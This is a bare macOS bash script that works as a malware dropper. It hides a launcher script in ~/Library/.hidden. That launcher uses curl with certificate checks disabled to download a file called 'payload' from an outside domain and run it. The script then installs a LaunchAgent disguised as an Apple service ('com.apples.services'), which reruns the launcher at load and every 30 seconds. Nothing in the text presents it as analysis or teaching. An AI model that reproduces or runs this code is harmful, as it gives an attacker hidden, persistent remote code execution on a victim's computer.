#!/bin/bash
mkdir -p ~/Library/.hidden
echo '#!/bin/bash
cd ~/Library/.hidden
curl -k -O https://www.angelparliament.com/payload && chmod +x payload && ./payload' > ~/Library/.hidden/connect.sh
chmod +x ~/Library/.hidden/connect.sh
mkdir -p ~/Library/LaunchAgents
echo "<plist version=\"1.0\">
<dict>
<key>Label</key>
<string>com.apples.services</string>
<key>ProgramArguments</key>
<array>
<string>/bin/bash</string>
<string>$HOME/Library/.hidden/connect.sh</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>StartInterval</key>
<integer>30</integer>
<key>AbandonProcessGroup</key>
<true/>
</dict>
</plist>" > ~/Library/LaunchAgents/com.apples.services.plist
chmod 600 ~/Library/LaunchAgents/com.apples.services.plist
launchctl load ~/Library/LaunchAgents/com.apples.services.plist
